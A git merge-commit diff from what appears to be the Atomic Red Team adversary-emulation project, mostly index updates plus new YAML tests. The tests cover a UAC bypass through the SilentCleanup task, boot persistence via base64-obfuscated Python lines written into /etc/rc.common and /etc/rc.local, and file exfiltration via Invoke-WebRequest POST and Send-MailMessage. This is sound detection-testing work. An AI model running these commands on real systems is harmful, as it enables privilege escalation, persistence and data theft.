Merge branch 'master' into T1552-001-Credentials-In-File-Github-Access-Token-Linux-MacOS

2021-06-04 11:15:10 -06:00
parent 3f7ee8151e 94d442bcd6
commit 2fdcd4f5a0
19 changed files with 506 additions and 22 deletions
@@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
 privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -159,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4
 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
 privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -215,6 +218,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
 defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -534,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a
 persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -618,6 +624,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
 discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
 privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
 persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
 privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
 defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -436,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
 discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -227,6 +227,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -323,6 +324,8 @@
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
  - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
  - Atomic Test #1: Re-Opened Applications [macos]
  - Atomic Test #2: Re-Opened Applications [macos]
@@ -417,6 +420,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -965,6 +969,8 @@
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
  - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
  - Atomic Test #1: Re-Opened Applications [macos]
@@ -1119,6 +1125,7 @@
  - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -122,7 +122,9 @@
 - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
  - Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -451,7 +453,9 @@
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -178,6 +178,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +309,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -818,6 +820,7 @@
  - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -23,7 +23,7 @@
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -40,7 +40,7 @@
 |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [RC Scripts](../../T1037.004/T1037.004.md) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -10120,6 +10120,31 @@ privilege-escalation:
 '
        name: command_prompt
        elevation_required: true
+    - name: Bypass UAC using SilentCleanup task
+      auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+      description: |
+        Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+        There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+        For example, we can set the windir registry kye to: "cmd /k REM "
+
+        And forcefully run SilentCleanup task:
+
+        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+        REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path to the bat file
+          type: String
+          default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+      executor:
+        command: "#{file_path}\n"
+        name: command_prompt
+        elevation_required: false
  T1574.012:
    technique:
      external_references:
@@ -15364,6 +15389,48 @@ privilege-escalation:
 '
        elevation_required: true
        name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
  T1547.007:
    technique:
      created: '2020-01-24T18:15:06.641Z'
@@ -19315,6 +19382,31 @@ defense-evasion:
 '
        name: command_prompt
        elevation_required: true
+    - name: Bypass UAC using SilentCleanup task
+      auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+      description: |
+        Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+        There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+        For example, we can set the windir registry kye to: "cmd /k REM "
+
+        And forcefully run SilentCleanup task:
+
+        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+        REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path to the bat file
+          type: String
+          default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+      executor:
+        command: "#{file_path}\n"
+        name: command_prompt
+        elevation_required: false
  T1218.003:
    technique:
      external_references:
@@ -28887,11 +28979,9 @@ defense-evasion:
          description: SMTP Server IP Address
          type: string
          default: 127.0.0.1
-      dependency_executor_name: powershell
      executor:
-        command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
-          Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
-          -SmtpServer #{smtp_server}"
+        command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+          -Attachments #{input_file} -SmtpServer #{smtp_server}

 '
        name: powershell
@@ -28911,9 +29001,8 @@ defense-evasion:
          description: Destination IP address
          type: string
          default: 127.0.0.1
-      dependency_executor_name: powershell
      executor:
-        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}

 '
        name: powershell
@@ -42988,6 +43077,48 @@ persistence:
 '
        elevation_required: true
        name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
